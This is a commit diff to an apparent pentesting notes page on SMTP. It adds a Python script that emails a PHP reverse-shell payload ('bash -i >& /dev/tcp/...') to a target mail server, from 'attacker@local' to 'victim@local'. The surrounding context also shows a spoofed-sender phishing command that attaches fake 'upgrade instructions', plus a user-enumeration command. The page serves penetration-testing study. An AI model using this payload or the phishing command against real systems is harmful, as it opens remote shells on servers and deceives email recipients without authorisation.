Merge pull request #102 from mr-wacker/master
Adding a new note "Sending an Email with Python" in pentesting/pentesting-smtp
This commit is contained in:
commit
be1658e9f9
@ -153,7 +153,7 @@ Nmap: nmap --script smtp-enum-users <IP>
|
|||||||
|
|
||||||
## [Commands](smtp-commands.md)
|
## [Commands](smtp-commands.md)
|
||||||
|
|
||||||
## Send Email from linux console
|
### Sending an Email from linux console
|
||||||
|
|
||||||
```text
|
```text
|
||||||
root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
|
root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
|
||||||
@ -171,6 +171,54 @@ Sincerely,
|
|||||||
|
|
||||||
From: [https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/](https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/)
|
From: [https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/](https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/)
|
||||||
|
|
||||||
|
### Sending an Email with Python
|
||||||
|
|
||||||
|
Here's alternative way to send an email with python script
|
||||||
|
|
||||||
|
```python
|
||||||
|
from email.mime.multipart import MIMEMultipart
|
||||||
|
from email.mime.text import MIMEText
|
||||||
|
import smtplib
|
||||||
|
import sys
|
||||||
|
|
||||||
|
lhost = "127.0.0.1"
|
||||||
|
lport = 443
|
||||||
|
rhost = "192.168.1.1"
|
||||||
|
rport = 25 # 489,587
|
||||||
|
|
||||||
|
# create message object instance
|
||||||
|
msg = MIMEMultipart()
|
||||||
|
|
||||||
|
# setup the parameters of the message
|
||||||
|
password = ""
|
||||||
|
msg['From'] = "attacker@local"
|
||||||
|
msg['To'] = "victim@local"
|
||||||
|
msg['Subject'] = "This is not a drill!"
|
||||||
|
|
||||||
|
# payload
|
||||||
|
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
|
||||||
|
|
||||||
|
print("[*] Payload is generated : %s" % message)
|
||||||
|
|
||||||
|
msg.attach(MIMEText(message, 'plain'))
|
||||||
|
server = smtplib.SMTP(host=rhost,port=rport)
|
||||||
|
|
||||||
|
if server.noop()[0] != 250:
|
||||||
|
print("[-]Connection Error")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
server.starttls()
|
||||||
|
|
||||||
|
# Uncomment if log-in with authencation
|
||||||
|
# server.login(msg['From'], password)
|
||||||
|
|
||||||
|
server.sendmail(msg['From'], msg['To'], msg.as_string())
|
||||||
|
server.quit()
|
||||||
|
|
||||||
|
print("[***]successfully sent email to %s:" % (msg['To']))
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mail Spoofing
|
## Mail Spoofing
|
||||||
|
|
||||||
Most of this section was extracted from the book **Network Security Assessment 3rd Edition**.
|
Most of this section was extracted from the book **Network Security Assessment 3rd Edition**.
|
||||||
|
Loading…
Reference in New Issue
Block a user